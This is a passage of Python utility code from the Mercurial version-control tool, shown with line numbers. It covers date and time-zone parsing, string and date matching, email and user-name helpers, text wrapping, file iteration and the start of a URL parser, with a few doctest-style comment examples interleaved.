2009 2009 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2010 2010
2011 2011 # ISO8601 trailing Z
2012 2012 if s.endswith("Z") and s[-2:-1].isdigit():
2013 2013 return 0, s[:-1]
2014 2014
2015 2015 # ISO8601-style [+-]hh:mm
2016 2016 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2017 2017 s[-5:-3].isdigit() and s[-2:].isdigit()):
2018 2018 sign = (s[-6] == "+") and 1 or -1
2019 2019 hours = int(s[-5:-3])
2020 2020 minutes = int(s[-2:])
2021 2021 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2022 2022
2023 2023 return None, s
2024 2024
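# Examples of the recognized suffixes (doctest-style). Note the sign
# convention used below: "unixtime = localunixtime + offset", so UTC-5
# yields a positive offset of 5 hours:
#
#   >>> parsetimezone(b'Jan 3 2017 10:00 -0500')
#   (18000, 'Jan 3 2017 10:00')
#   >>> parsetimezone(b'2017-01-03T10:00Z')
#   (0, '2017-01-03T10:00')
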
2025 2025 def strdate(string, format, defaults=None):
2026 2026 """parse a localized time string and return a (unixtime, offset) tuple.
2027 2027 if the string cannot be parsed, ValueError is raised."""
2028 2028 if defaults is None:
2029 2029 defaults = {}
2030 2030
2031 2031 # NOTE: unixtime = localunixtime + offset
2032 2032 offset, date = parsetimezone(string)
2033 2033
2034 2034 # add missing elements from defaults
2035 2035 usenow = False # default to using biased defaults
2036 2036 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2037 2037 part = pycompat.bytestr(part)
2038 2038 found = [True for p in part if ("%"+p) in format]
2039 2039 if not found:
2040 2040 date += "@" + defaults[part][usenow]
2041 2041 format += "@%" + part[0]
2042 2042 else:
2043 2043 # We've found a specific time element, less specific time
2044 2044 # elements are relative to today
2045 2045 usenow = True
2046 2046
2047 2047 timetuple = time.strptime(encoding.strfromlocal(date),
2048 2048 encoding.strfromlocal(format))
2049 2049 localunixtime = int(calendar.timegm(timetuple))
2050 2050 if offset is None:
2051 2051 # local timezone
2052 2052 unixtime = int(time.mktime(timetuple))
2053 2053 offset = unixtime - localunixtime
2054 2054 else:
2055 2055 unixtime = localunixtime + offset
2056 2056 return unixtime, offset
2057 2057
2058 2058 def parsedate(date, formats=None, bias=None):
2059 2059 """parse a localized date/time and return a (unixtime, offset) tuple.
2060 2060
2061 2061 The date may be a "unixtime offset" string or in one of the specified
2062 2062 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2063 2063
2064 2064 >>> parsedate(b' today ') == parsedate(
2065 2065 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2066 2066 True
2067 2067 >>> parsedate(b'yesterday ') == parsedate(
2068 2068 ... (datetime.date.today() - datetime.timedelta(days=1)
2069 2069 ... ).strftime('%b %d').encode('ascii'))
2070 2070 True
2071 2071 >>> now, tz = makedate()
2072 2072 >>> strnow, strtz = parsedate(b'now')
2073 2073 >>> (strnow - now) < 1
2074 2074 True
2075 2075 >>> tz == strtz
2076 2076 True
2077 2077 """
2078 2078 if bias is None:
2079 2079 bias = {}
2080 2080 if not date:
2081 2081 return 0, 0
2082 2082 if isinstance(date, tuple) and len(date) == 2:
2083 2083 return date
2084 2084 if not formats:
2085 2085 formats = defaultdateformats
2086 2086 date = date.strip()
2087 2087
2088 2088 if date == 'now' or date == _('now'):
2089 2089 return makedate()
2090 2090 if date == 'today' or date == _('today'):
2091 2091 date = datetime.date.today().strftime(r'%b %d')
2092 2092 date = encoding.strtolocal(date)
2093 2093 elif date == 'yesterday' or date == _('yesterday'):
2094 2094 date = (datetime.date.today() -
2095 2095 datetime.timedelta(days=1)).strftime(r'%b %d')
2096 2096 date = encoding.strtolocal(date)
2097 2097
2098 2098 try:
2099 2099 when, offset = map(int, date.split(' '))
2100 2100 except ValueError:
2101 2101 # fill out defaults
2102 2102 now = makedate()
2103 2103 defaults = {}
2104 2104 for part in ("d", "mb", "yY", "HI", "M", "S"):
2105 2105 # this piece is for rounding the specific end of unknowns
2106 2106 b = bias.get(part)
2107 2107 if b is None:
2108 2108 if part[0:1] in "HMS":
2109 2109 b = "00"
2110 2110 else:
2111 2111 b = "0"
2112 2112
2113 2113 # this piece is for matching the generic end to today's date
2114 2114 n = datestr(now, "%" + part[0:1])
2115 2115
2116 2116 defaults[part] = (b, n)
2117 2117
2118 2118 for format in formats:
2119 2119 try:
2120 2120 when, offset = strdate(date, format, defaults)
2121 2121 except (ValueError, OverflowError):
2122 2122 pass
2123 2123 else:
2124 2124 break
2125 2125 else:
2126 2126 raise error.ParseError(_('invalid date: %r') % date)
2127 2127 # validate explicit (probably user-specified) date and
2128 2128 # time zone offset. values must fit in signed 32 bits for
2129 2129 # current 32-bit linux runtimes. timezones go from UTC-12
2130 2130 # to UTC+14
2131 2131 if when < -0x80000000 or when > 0x7fffffff:
2132 2132 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2133 2133 if offset < -50400 or offset > 43200:
2134 2134 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2135 2135 return when, offset
2136 2136
2137 2137 def matchdate(date):
2138 2138 """Return a function that matches a given date match specifier
2139 2139
2140 2140 Formats include:
2141 2141
2142 2142 '{date}' match a given date to the accuracy provided
2143 2143
2144 2144 '<{date}' on or before a given date
2145 2145
2146 2146 '>{date}' on or after a given date
2147 2147
2148 2148 >>> p1 = parsedate(b"10:29:59")
2149 2149 >>> p2 = parsedate(b"10:30:00")
2150 2150 >>> p3 = parsedate(b"10:30:59")
2151 2151 >>> p4 = parsedate(b"10:31:00")
2152 2152 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2153 2153 >>> f = matchdate(b"10:30")
2154 2154 >>> f(p1[0])
2155 2155 False
2156 2156 >>> f(p2[0])
2157 2157 True
2158 2158 >>> f(p3[0])
2159 2159 True
2160 2160 >>> f(p4[0])
2161 2161 False
2162 2162 >>> f(p5[0])
2163 2163 False
2164 2164 """
2165 2165
2166 2166 def lower(date):
2167 2167 d = {'mb': "1", 'd': "1"}
2168 2168 return parsedate(date, extendeddateformats, d)[0]
2169 2169
2170 2170 def upper(date):
2171 2171 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2172 2172 for days in ("31", "30", "29"):
2173 2173 try:
2174 2174 d["d"] = days
2175 2175 return parsedate(date, extendeddateformats, d)[0]
2176 2176 except Abort:
2177 2177 pass
2178 2178 d["d"] = "28"
2179 2179 return parsedate(date, extendeddateformats, d)[0]
2180 2180
2181 2181 date = date.strip()
2182 2182
2183 2183 if not date:
2184 2184 raise Abort(_("dates cannot consist entirely of whitespace"))
2185 2185 elif date[0] == "<":
2186 2186 if not date[1:]:
2187 2187 raise Abort(_("invalid day spec, use '<DATE'"))
2188 2188 when = upper(date[1:])
2189 2189 return lambda x: x <= when
2190 2190 elif date[0] == ">":
2191 2191 if not date[1:]:
2192 2192 raise Abort(_("invalid day spec, use '>DATE'"))
2193 2193 when = lower(date[1:])
2194 2194 return lambda x: x >= when
2195 2195 elif date[0] == "-":
2196 2196 try:
2197 2197 days = int(date[1:])
2198 2198 except ValueError:
2199 2199 raise Abort(_("invalid day spec: %s") % date[1:])
2200 2200 if days < 0:
2201 2201 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2202 2202 % date[1:])
2203 2203 when = makedate()[0] - days * 3600 * 24
2204 2204 return lambda x: x >= when
2205 2205 elif " to " in date:
2206 2206 a, b = date.split(" to ")
2207 2207 start, stop = lower(a), upper(b)
2208 2208 return lambda x: x >= start and x <= stop
2209 2209 else:
2210 2210 start, stop = lower(date), upper(date)
2211 2211 return lambda x: x >= start and x <= stop
2212 2212
2213 2213 def stringmatcher(pattern, casesensitive=True):
2214 2214 """
2215 2215 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2216 2216 returns the matcher name, pattern, and matcher function.
2217 2217 missing or unknown prefixes are treated as literal matches.
2218 2218
2219 2219 helper for tests:
2220 2220 >>> def test(pattern, *tests):
2221 2221 ... kind, pattern, matcher = stringmatcher(pattern)
2222 2222 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2223 2223 >>> def itest(pattern, *tests):
2224 2224 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2225 2225 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2226 2226
2227 2227 exact matching (no prefix):
2228 2228 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2229 2229 ('literal', 'abcdefg', [False, False, True])
2230 2230
2231 2231 regex matching ('re:' prefix)
2232 2232 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2233 2233 ('re', 'a.+b', [False, False, True])
2234 2234
2235 2235 force exact matches ('literal:' prefix)
2236 2236 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2237 2237 ('literal', 're:foobar', [False, True])
2238 2238
2239 2239 unknown prefixes are ignored and treated as literals
2240 2240 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2241 2241 ('literal', 'foo:bar', [False, False, True])
2242 2242
2243 2243 case insensitive regex matches
2244 2244 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2245 2245 ('re', 'A.+b', [False, False, True])
2246 2246
2247 2247 case insensitive literal matches
2248 2248 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2249 2249 ('literal', 'ABCDEFG', [False, False, True])
2250 2250 """
2251 2251 if pattern.startswith('re:'):
2252 2252 pattern = pattern[3:]
2253 2253 try:
2254 2254 flags = 0
2255 2255 if not casesensitive:
2256 2256 flags = remod.I
2257 2257 regex = remod.compile(pattern, flags)
2258 2258 except remod.error as e:
2259 2259 raise error.ParseError(_('invalid regular expression: %s')
2260 2260 % e)
2261 2261 return 're', pattern, regex.search
2262 2262 elif pattern.startswith('literal:'):
2263 2263 pattern = pattern[8:]
2264 2264
2265 2265 match = pattern.__eq__
2266 2266
2267 2267 if not casesensitive:
2268 2268 ipat = encoding.lower(pattern)
2269 2269 match = lambda s: ipat == encoding.lower(s)
2270 2270 return 'literal', pattern, match
2271 2271
2272 2272 def shortuser(user):
2273 2273 """Return a short representation of a user name or email address."""
2274 2274 f = user.find('@')
2275 2275 if f >= 0:
2276 2276 user = user[:f]
2277 2277 f = user.find('<')
2278 2278 if f >= 0:
2279 2279 user = user[f + 1:]
2280 2280 f = user.find(' ')
2281 2281 if f >= 0:
2282 2282 user = user[:f]
2283 2283 f = user.find('.')
2284 2284 if f >= 0:
2285 2285 user = user[:f]
2286 2286 return user
2287 2287
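# Doctest-style illustration (hypothetical address); each rule above
# strips one layer until the bare first name remains:
#
#   >>> shortuser(b'John Doe <john.doe@example.com>')
#   'john'
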
2288 2288 def emailuser(user):
2289 2289 """Return the user portion of an email address."""
2290 2290 f = user.find('@')
2291 2291 if f >= 0:
2292 2292 user = user[:f]
2293 2293 f = user.find('<')
2294 2294 if f >= 0:
2295 2295 user = user[f + 1:]
2296 2296 return user
2297 2297
2298 2298 def email(author):
2299 2299 '''get email of author.'''
2300 2300 r = author.find('>')
2301 2301 if r == -1:
2302 2302 r = None
2303 2303 return author[author.find('<') + 1:r]
2304 2304
2305 2305 def ellipsis(text, maxlength=400):
2306 2306 """Trim string to at most maxlength (default: 400) columns in display."""
2307 2307 return encoding.trim(text, maxlength, ellipsis='...')
2308 2308
2309 2309 def unitcountfn(*unittable):
2310 2310 '''return a function that renders a readable count of some quantity'''
2311 2311
2312 2312 def go(count):
2313 2313 for multiplier, divisor, format in unittable:
2314 2314 if abs(count) >= divisor * multiplier:
2315 2315 return format % (count / float(divisor))
2316 2316 return unittable[-1][2] % count
2317 2317
2318 2318 return go
2319 2319
2320 2320 def processlinerange(fromline, toline):
2321 2321 """Check that linerange <fromline>:<toline> makes sense and return a
2322 2322 0-based range.
2323 2323
2324 2324 >>> processlinerange(10, 20)
2325 2325 (9, 20)
2326 2326 >>> processlinerange(2, 1)
2327 2327 Traceback (most recent call last):
2328 2328 ...
2329 2329 ParseError: line range must be positive
2330 2330 >>> processlinerange(0, 5)
2331 2331 Traceback (most recent call last):
2332 2332 ...
2333 2333 ParseError: fromline must be strictly positive
2334 2334 """
2335 2335 if toline - fromline < 0:
2336 2336 raise error.ParseError(_("line range must be positive"))
2337 2337 if fromline < 1:
2338 2338 raise error.ParseError(_("fromline must be strictly positive"))
2339 2339 return fromline - 1, toline
2340 2340
2341 2341 bytecount = unitcountfn(
2342 2342 (100, 1 << 30, _('%.0f GB')),
2343 2343 (10, 1 << 30, _('%.1f GB')),
2344 2344 (1, 1 << 30, _('%.2f GB')),
2345 2345 (100, 1 << 20, _('%.0f MB')),
2346 2346 (10, 1 << 20, _('%.1f MB')),
2347 2347 (1, 1 << 20, _('%.2f MB')),
2348 2348 (100, 1 << 10, _('%.0f KB')),
2349 2349 (10, 1 << 10, _('%.1f KB')),
2350 2350 (1, 1 << 10, _('%.2f KB')),
2351 2351 (1, 1, _('%.0f bytes')),
2352 2352 )
2353 2353
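# How the table above resolves: the first row whose threshold
# (multiplier * divisor) the value reaches decides the format:
#
#   >>> bytecount(200)
#   '200 bytes'
#   >>> bytecount(100000)
#   '97.7 KB'
#   >>> bytecount(1 << 30)
#   '1.00 GB'
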
2354 2354 # Matches a single EOL which can either be a CRLF (any run of preceding
2355 2355 # CRs is removed) or a LF. We do not care about old Macintosh files, so a
2356 2356 # stray CR is an error.
2357 2357 _eolre = remod.compile(br'\r*\n')
2358 2358
2359 2359 def tolf(s):
2360 2360 return _eolre.sub('\n', s)
2361 2361
2362 2362 def tocrlf(s):
2363 2363 return _eolre.sub('\r\n', s)
2364 2364
2365 2365 if pycompat.oslinesep == '\r\n':
2366 2366 tonativeeol = tocrlf
2367 2367 fromnativeeol = tolf
2368 2368 else:
2369 2369 tonativeeol = pycompat.identity
2370 2370 fromnativeeol = pycompat.identity
2371 2371
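# EOL normalization sketch: per _eolre, any run of CRs directly before a
# LF is folded into the replacement:
#
#   >>> tolf(b'a\r\r\nb\n')
#   'a\nb\n'
#   >>> tocrlf(b'a\nb\n')
#   'a\r\nb\r\n'
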
2372 2372 def escapestr(s):
2373 2373 # call underlying function of s.encode('string_escape') directly for
2374 2374 # Python 3 compatibility
2375 2375 return codecs.escape_encode(s)[0]
2376 2376
2377 2377 def unescapestr(s):
2378 2378 return codecs.escape_decode(s)[0]
2379 2379
2380 2380 def forcebytestr(obj):
2381 2381 """Portably format an arbitrary object (e.g. exception) into a byte
2382 2382 string."""
2383 2383 try:
2384 2384 return pycompat.bytestr(obj)
2385 2385 except UnicodeEncodeError:
2386 2386 # non-ascii string, may be lossy
2387 2387 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2388 2388
2389 2389 def uirepr(s):
2390 2390 # Avoid double backslash in Windows path repr()
2391 2391 return repr(s).replace('\\\\', '\\')
2392 2392
2393 2393 # delay import of textwrap
2394 2394 def MBTextWrapper(**kwargs):
2395 2395 class tw(textwrap.TextWrapper):
2396 2396 """
2397 2397 Extend TextWrapper for width-awareness.
2398 2398
2399 2399 Neither the number of 'bytes' in any encoding nor the number of
2400 2400 'characters' is appropriate for calculating a string's terminal columns.
2401 2401
2402 2402 The original TextWrapper implementation uses the built-in 'len()' directly,
2403 2403 so overriding is needed to use the width information of each character.
2404 2404
2405 2405 In addition, characters classified as 'ambiguous' width are treated
2406 2406 as wide in East Asian locales, but as narrow elsewhere.
2407 2407
2408 2408 This requires a user decision to determine the width of such characters.
2409 2409 """
2410 2410 def _cutdown(self, ucstr, space_left):
2411 2411 l = 0
2412 2412 colwidth = encoding.ucolwidth
2413 2413 for i in xrange(len(ucstr)):
2414 2414 l += colwidth(ucstr[i])
2415 2415 if space_left < l:
2416 2416 return (ucstr[:i], ucstr[i:])
2417 2417 return ucstr, ''
2418 2418
2419 2419 # overriding of base class
2420 2420 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2421 2421 space_left = max(width - cur_len, 1)
2422 2422
2423 2423 if self.break_long_words:
2424 2424 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2425 2425 cur_line.append(cut)
2426 2426 reversed_chunks[-1] = res
2427 2427 elif not cur_line:
2428 2428 cur_line.append(reversed_chunks.pop())
2429 2429
2430 2430 # this overriding code is imported from TextWrapper of Python 2.6
2431 2431 # to calculate columns of string by 'encoding.ucolwidth()'
2432 2432 def _wrap_chunks(self, chunks):
2433 2433 colwidth = encoding.ucolwidth
2434 2434
2435 2435 lines = []
2436 2436 if self.width <= 0:
2437 2437 raise ValueError("invalid width %r (must be > 0)" % self.width)
2438 2438
2439 2439 # Arrange in reverse order so items can be efficiently popped
2440 2440 # from a stack of chunks.
2441 2441 chunks.reverse()
2442 2442
2443 2443 while chunks:
2444 2444
2445 2445 # Start the list of chunks that will make up the current line.
2446 2446 # cur_len is just the length of all the chunks in cur_line.
2447 2447 cur_line = []
2448 2448 cur_len = 0
2449 2449
2450 2450 # Figure out which static string will prefix this line.
2451 2451 if lines:
2452 2452 indent = self.subsequent_indent
2453 2453 else:
2454 2454 indent = self.initial_indent
2455 2455
2456 2456 # Maximum width for this line.
2457 2457 width = self.width - len(indent)
2458 2458
2459 2459 # First chunk on line is whitespace -- drop it, unless this
2460 2460 # is the very beginning of the text (i.e. no lines started yet).
2461 2461 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2462 2462 del chunks[-1]
2463 2463
2464 2464 while chunks:
2465 2465 l = colwidth(chunks[-1])
2466 2466
2467 2467 # Can at least squeeze this chunk onto the current line.
2468 2468 if cur_len + l <= width:
2469 2469 cur_line.append(chunks.pop())
2470 2470 cur_len += l
2471 2471
2472 2472 # Nope, this line is full.
2473 2473 else:
2474 2474 break
2475 2475
2476 2476 # The current line is full, and the next chunk is too big to
2477 2477 # fit on *any* line (not just this one).
2478 2478 if chunks and colwidth(chunks[-1]) > width:
2479 2479 self._handle_long_word(chunks, cur_line, cur_len, width)
2480 2480
2481 2481 # If the last chunk on this line is all whitespace, drop it.
2482 2482 if (self.drop_whitespace and
2483 2483 cur_line and cur_line[-1].strip() == r''):
2484 2484 del cur_line[-1]
2485 2485
2486 2486 # Convert current line back to a string and store it in list
2487 2487 # of all lines (return value).
2488 2488 if cur_line:
2489 2489 lines.append(indent + r''.join(cur_line))
2490 2490
2491 2491 return lines
2492 2492
2493 2493 global MBTextWrapper
2494 2494 MBTextWrapper = tw
2495 2495 return tw(**kwargs)
2496 2496
2497 2497 def wrap(line, width, initindent='', hangindent=''):
2498 2498 maxindent = max(len(hangindent), len(initindent))
2499 2499 if width <= maxindent:
2500 2500 # adjust for weird terminal size
2501 2501 width = max(78, maxindent + 1)
2502 2502 line = line.decode(pycompat.sysstr(encoding.encoding),
2503 2503 pycompat.sysstr(encoding.encodingmode))
2504 2504 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2505 2505 pycompat.sysstr(encoding.encodingmode))
2506 2506 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2507 2507 pycompat.sysstr(encoding.encodingmode))
2508 2508 wrapper = MBTextWrapper(width=width,
2509 2509 initial_indent=initindent,
2510 2510 subsequent_indent=hangindent)
2511 2511 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2512 2512
2513 2513 if (pyplatform.python_implementation() == 'CPython' and
2514 2514 sys.version_info < (3, 0)):
2515 2515 # There is an issue in CPython that some IO methods do not handle EINTR
2516 2516 # correctly. The following table shows what CPython version (and functions)
2517 2517 # are affected (buggy: has the EINTR bug, okay: otherwise):
2518 2518 #
2519 2519 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2520 2520 # --------------------------------------------------
2521 2521 # fp.__iter__ | buggy | buggy | okay
2522 2522 # fp.read* | buggy | okay [1] | okay
2523 2523 #
2524 2524 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2525 2525 #
2526 2526 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2527 2527 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2528 2528 #
2529 2529 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2530 2530 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2531 2531 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2532 2532 # fp.__iter__ but not other fp.read* methods.
2533 2533 #
2534 2534 # On modern systems like Linux, the "read" syscall cannot be interrupted
2535 2535 # when reading "fast" files like on-disk files. So the EINTR issue only
2536 2536 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2537 2537 # files approximately as "fast" files and use the fast (unsafe) code path,
2538 2538 # to minimize the performance impact.
2539 2539 if sys.version_info >= (2, 7, 4):
2540 2540 # fp.readline deals with EINTR correctly, use it as a workaround.
2541 2541 def _safeiterfile(fp):
2542 2542 return iter(fp.readline, '')
2543 2543 else:
2544 2544 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2545 2545 # note: this may block longer than necessary because of bufsize.
2546 2546 def _safeiterfile(fp, bufsize=4096):
2547 2547 fd = fp.fileno()
2548 2548 line = ''
2549 2549 while True:
2550 2550 try:
2551 2551 buf = os.read(fd, bufsize)
2552 2552 except OSError as ex:
2553 2553 # os.read only raises EINTR before any data is read
2554 2554 if ex.errno == errno.EINTR:
2555 2555 continue
2556 2556 else:
2557 2557 raise
2558 2558 line += buf
2559 2559 if '\n' in buf:
2560 2560 splitted = line.splitlines(True)
2561 2561 line = ''
2562 2562 for l in splitted:
2563 2563 if l[-1] == '\n':
2564 2564 yield l
2565 2565 else:
2566 2566 line = l
2567 2567 if not buf:
2568 2568 break
2569 2569 if line:
2570 2570 yield line
2571 2571
2572 2572 def iterfile(fp):
2573 2573 fastpath = True
2574 2574 if type(fp) is file:
2575 2575 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2576 2576 if fastpath:
2577 2577 return fp
2578 2578 else:
2579 2579 return _safeiterfile(fp)
2580 2580 else:
2581 2581 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2582 2582 def iterfile(fp):
2583 2583 return fp
2584 2584
2585 2585 def iterlines(iterator):
2586 2586 for chunk in iterator:
2587 2587 for line in chunk.splitlines():
2588 2588 yield line
2589 2589
2590 2590 def expandpath(path):
2591 2591 return os.path.expanduser(os.path.expandvars(path))
2592 2592
2593 2593 def hgcmd():
2594 2594 """Return the command used to execute current hg
2595 2595
2596 2596 This is different from hgexecutable() because on Windows we want
2597 2597 to avoid things opening new shell windows like batch files, so we
2598 2598 get either the python call or current executable.
2599 2599 """
2600 2600 if mainfrozen():
2601 2601 if getattr(sys, 'frozen', None) == 'macosx_app':
2602 2602 # Env variable set by py2app
2603 2603 return [encoding.environ['EXECUTABLEPATH']]
2604 2604 else:
2605 2605 return [pycompat.sysexecutable]
2606 2606 return gethgcmd()
2607 2607
2608 2608 def rundetached(args, condfn):
2609 2609 """Execute the argument list in a detached process.
2610 2610
2611 2611 condfn is a callable which is called repeatedly and should return
2612 2612 True once the child process is known to have started successfully.
2613 2613 At this point, the child process PID is returned. If the child
2614 2614 process fails to start or finishes before condfn() evaluates to
2615 2615 True, return -1.
2616 2616 """
2617 2617 # Windows case is easier because the child process is either
2618 2618 # successfully starting and validating the condition or exiting
2619 2619 # on failure. We just poll on its PID. On Unix, if the child
2620 2620 # process fails to start, it will be left in a zombie state until
2621 2621 # the parent wait on it, which we cannot do since we expect a long
2622 2622 # running process on success. Instead we listen for SIGCHLD telling
2623 2623 # us our child process terminated.
2624 2624 terminated = set()
2625 2625 def handler(signum, frame):
2626 2626 terminated.add(os.wait())
2627 2627 prevhandler = None
2628 2628 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2629 2629 if SIGCHLD is not None:
2630 2630 prevhandler = signal.signal(SIGCHLD, handler)
2631 2631 try:
2632 2632 pid = spawndetached(args)
2633 2633 while not condfn():
2634 2634 if ((pid in terminated or not testpid(pid))
2635 2635 and not condfn()):
2636 2636 return -1
2637 2637 time.sleep(0.1)
2638 2638 return pid
2639 2639 finally:
2640 2640 if prevhandler is not None:
2641 2641 signal.signal(signal.SIGCHLD, prevhandler)
2642 2642
2643 2643 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2644 2644 """Return the result of interpolating items in the mapping into string s.
2645 2645
2646 2646 prefix is a single character string, or a two character string with
2647 2647 a backslash as the first character if the prefix needs to be escaped in
2648 2648 a regular expression.
2649 2649
2650 2650 fn is an optional function that will be applied to the replacement text
2651 2651 just before replacement.
2652 2652
2653 2653 escape_prefix is an optional flag that allows using doubled prefix for
2654 2654 its escaping.
2655 2655 """
2656 2656 fn = fn or (lambda s: s)
2657 2657 patterns = '|'.join(mapping.keys())
2658 2658 if escape_prefix:
2659 2659 patterns += '|' + prefix
2660 2660 if len(prefix) > 1:
2661 2661 prefix_char = prefix[1:]
2662 2662 else:
2663 2663 prefix_char = prefix
2664 2664 mapping[prefix_char] = prefix_char
2665 2665 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2666 2666 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2667 2667
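# A small interpolation sketch (hypothetical mapping). With
# escape_prefix=True, a doubled prefix ('%%') renders a literal '%':
#
#   >>> interpolate(b'%', {b'foo': b'bar'}, b'say %foo')
#   'say bar'
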
2668 2668 def getport(port):
2669 2669 """Return the port for a given network service.
2670 2670
2671 2671 If port is an integer, it's returned as is. If it's a string, it's
2672 2672 looked up using socket.getservbyname(). If there's no matching
2673 2673 service, error.Abort is raised.
2674 2674 """
2675 2675 try:
2676 2676 return int(port)
2677 2677 except ValueError:
2678 2678 pass
2679 2679
2680 2680 try:
2681 2681 return socket.getservbyname(port)
2682 2682 except socket.error:
2683 2683 raise Abort(_("no port number associated with service '%s'") % port)
2684 2684
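# Both spellings work (the second lookup goes through the OS services
# database, so the result assumes a standard /etc/services):
#
#   >>> getport(b'8080')
#   8080
#   >>> getport(b'http')
#   80
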
2685 2685 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2686 2686 '0': False, 'no': False, 'false': False, 'off': False,
2687 2687 'never': False}
2688 2688
2689 2689 def parsebool(s):
2690 2690 """Parse s into a boolean.
2691 2691
2692 2692 If s is not a valid boolean, returns None.
2693 2693 """
2694 2694 return _booleans.get(s.lower(), None)
2695 2695
2696 2696 _hextochr = dict((a + b, chr(int(a + b, 16)))
2697 2697 for a in string.hexdigits for b in string.hexdigits)
2698 2698
2699 2699 class url(object):
2700 2700 r"""Reliable URL parser.
2701 2701
2702 2702 This parses URLs and provides attributes for the following
2703 2703 components:
2704 2704
2705 2705 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2706 2706
2707 2707 Missing components are set to None. The only exception is
2708 2708 fragment, which is set to '' if present but empty.
2709 2709
2710 2710 If parsefragment is False, fragment is included in query. If
2711 2711 parsequery is False, query is included in path. If both are
2712 2712 False, both fragment and query are included in path.
2713 2713
2714 2714 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2715 2715
2716 2716 Note that for backward compatibility reasons, bundle URLs do not
2717 2717 take host names. That means 'bundle://../' has a path of '../'.
2718 2718
2719 2719 Examples:
2720 2720
2721 2721 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2722 2722 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2723 2723 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2724 2724 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2725 2725 >>> url(b'file:///home/joe/repo')
2726 2726 <url scheme: 'file', path: '/home/joe/repo'>
2727 2727 >>> url(b'file:///c:/temp/foo/')
2728 2728 <url scheme: 'file', path: 'c:/temp/foo/'>
2729 2729 >>> url(b'bundle:foo')
2730 2730 <url scheme: 'bundle', path: 'foo'>
2731 2731 >>> url(b'bundle://../foo')
2732 2732 <url scheme: 'bundle', path: '../foo'>
2733 2733 >>> url(br'c:\foo\bar')
2734 2734 <url path: 'c:\\foo\\bar'>
2735 2735 >>> url(br'\\blah\blah\blah')
2736 2736 <url path: '\\\\blah\\blah\\blah'>
2737 2737 >>> url(br'\\blah\blah\blah#baz')
2738 2738 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2739 2739 >>> url(br'file:///C:\users\me')
2740 2740 <url scheme: 'file', path: 'C:\\users\\me'>
2741 2741
2742 2742 Authentication credentials:
2743 2743
2744 2744 >>> url(b'ssh://joe:xyz@x/repo')
2745 2745 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2746 2746 >>> url(b'ssh://joe@x/repo')
2747 2747 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2748 2748
2749 2749 Query strings and fragments:
2750 2750
2751 2751 >>> url(b'http://host/a?b#c')
2752 2752 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2753 2753 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2754 2754 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2755 2755
2756 2756 Empty path:
2757 2757
2758 2758 >>> url(b'')
2759 2759 <url path: ''>
2760 2760 >>> url(b'#a')
2761 2761 <url path: '', fragment: 'a'>
2762 2762 >>> url(b'http://host/')
2763 2763 <url scheme: 'http', host: 'host', path: ''>
2764 2764 >>> url(b'http://host/#a')
2765 2765 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2766 2766
2767 2767 Only scheme:
2768 2768
2769 2769 >>> url(b'http:')
2770 2770 <url scheme: 'http'>
2771 2771 """
2772 2772
2773 2773 _safechars = "!~*'()+"
2774 2774 _safepchars = "/!~*'()+:\\"
2775 2775 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2776 2776
2777 2777 def __init__(self, path, parsequery=True, parsefragment=True):
2778 2778 # We slowly chomp away at path until we have only the path left
